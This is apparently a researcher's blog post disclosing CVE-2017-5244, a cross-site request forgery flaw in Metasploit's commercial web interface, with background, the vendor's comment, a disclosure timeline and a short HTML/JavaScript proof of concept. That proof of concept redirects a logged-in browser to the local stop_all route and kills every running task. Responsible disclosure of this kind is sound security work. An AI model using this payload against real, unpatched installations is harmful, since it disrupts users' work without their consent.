Vulnerability in Metasploit Project aka CVE-2017-5244

 

Hi Guys,
I hope you all are fine and doing well. Yes you read it right, We managed to find a vulnerability in a framework used to exploit vulnerabilities! “Today is me tomorrow will be you” 🙂

Today we will talk about a CSRF vulnerability affects the web application of both versions (Express, Community and Professional) of Metasploit Project.

But first what is Metasploit? (Seriously maybe somebody out there don’t know about it yet :D)

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.

The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.

Metasploit was created by H. D. Moore in 2003 as a portable network tool using Perl. By 2007, the Metasploit Framework had been completely rewritten in Ruby. On October 21, 2009, the Metasploit Project announced that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions.

Like comparable commercial products such as Immunity’s Canvas or Core Security Technologies’ Core Impact, Metasploit can be used to test the vulnerability of computer systems or to break into remote systems. Like many information security tools, Metasploit can be used for both legitimate and unauthorized activities. Since the acquisition of the Metasploit Framework, Rapid7 has added two open core proprietary editions called Metasploit Express and Metasploit Pro.

Metasploit’s emerging position as the de facto exploit development framework led to the release of software vulnerability advisories often accompanied by a third party Metasploit exploit module that highlights the exploitability, risk and remediation of that particular bug. Metasploit 3.0 began to include fuzzing tools, used to discover software vulnerabilities, rather than just exploits for known bugs. This avenue can be seen with the integration of the lorcon wireless (802.11) toolset into Metasploit 3.0 in November 2006. Metasploit 4.0 was released in August 2011.

 

This CSRF vulnerability can be used to perform an attack against all the running “Scans and Tasks” by metasploit project.

When we discovered this issue we’ve called it “The metasploit firewall”, So funny isn’t it! But why? If you hosted a page with the blew proof of concept code on your local/ web server index you will be tricking Metasploit scanning session to load this page (of course to scan it) hence kill all the running tasks. A firewall? hmmm kind of!

(Update: We thought it might be a valid attack vector but after some investigations it turned to be not because the crawler used by metasploit is not authenticated with the metasploit session itself)

Usability issue: There have to be an option to resume the stopped tasks to not to lose it at all after performing such attack.

Metasploit team comment about the issue:

CVE-2017-5244 (CWE-352: Cross-Site Request Forgery): Metasploit commercial editions allowed GET requests to the stop and stop_all (task) routes. This should not have been the case, as they change the state of the service, and should have been only allowed through POST requests. In addition, the origin of the requests was not verified until after processing. This could have allowed an attacker to stop one, or all, Metasploit tasks by getting an authenticated user to run JavaScript (e.g. via loading a malicious URL). Now the routes are only exposed to POST requests, which validate the presence of a secret token to prevent CSRF attacks (via Rails’ protect_from_forgery). This vulnerability was kindly reported to Rapid7 by Mohamed A. Baset (Founder and Cyber Security Advisor at Seekurity.com SAS de C.V. Mexico; @SymbianSyMoh).

Rapid7 made a public advisory with more technical details you can read about it here: https://community.rapid7.com/community/metasploit/blog/2017/06/14/r7-2017-16-cve-2017-5244-lack-of-csrf-protection-for-stopping-tasks-in-metasploit-pro-express-and-community-editions-fixed

And here is our advisory details:

# Exploit Title:

Metasploit Web Project Kill all running tasks CSRF

# Date reported:

27-5-2017

# Exploit Author:

Seekurity SAS de C.V. – Mohamed Abdelbasset Elnouby (@SymbianSyMoh)

# Vendor Homepage:

http://www.metasploit.com/

# Software Link:

https://www.rapid7.com/products/metasploit/download/editions/

# Affected Versions:

Express, Community and Pro < 4.14.0 (Update 2017051801)

# CVE number:

CVE-2017-5244

Vulnerability:

Cross Site Request Forgery – (CSRF) / Improper Anti-CSRF token validation

Vulnerability reference:

http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

Video PoC:

Impact:

After doing some research, i have found that the anti csrf token “authenticity_token” value is not validated from the local server side which will result in a csrf attack and kills all the currently running metasploit tasks (with no ability to resume).

Attack vectors:

Attackers can target a local metasploit user and use the PoC code to stop/kill all the running metasploit tasks, or by other MITM tricks like injecting the PoC code into the network traffic which will cause the same exact impact.

PoC Code:

<!DOCTYPE html>
<html>
<head>
<title>Metsploit Asset Firewall - Kill all running tasks bug PoC</title>
</head>
<h1>Metsploit Asset Firewall - Kill all running tasks bug PoC by Mohamed A. Baset - @Seekurity</h1>
<h2 style="color: red">Killing all running metasploit tasks after 5 seconds...</h2>
<script>
setInterval(function(){ window.location.replace("https://127.0.0.1:3790/tasks/stop_all"); }, 5000);
</script>
<body>
</body>
</html>

 

Disclosure Timeline

Sat, May 27, 2017:           Vulnerability reported to Rapid7 by Mohamed A. Baset
Tue, May 30, 2017:         Vulnerability confirmed by Rapid7
Fri, June 9, 2017:            Vulnerability fixed by Rapid7
Sun, June 11, 2017:         Rapid7 assigned CVE-2017-5244 to this vulnerability
Wed, June 14, 2017:       Rapid7 released patch; public disclosure
Wed, June 14, 2017:       Rapid7 reported vulnerability to MITRE (planned)

 

Many thanks to Samuel Huckins (Program Manager at Rapid7) who kept us updated and in a great and professional way!

 

Hey!

Building a website, an application or any kind of business? Or already have one? Worried about your security? Think twice before going public and let us protect your business!

(Visited 823 times, 2 visits today)
Share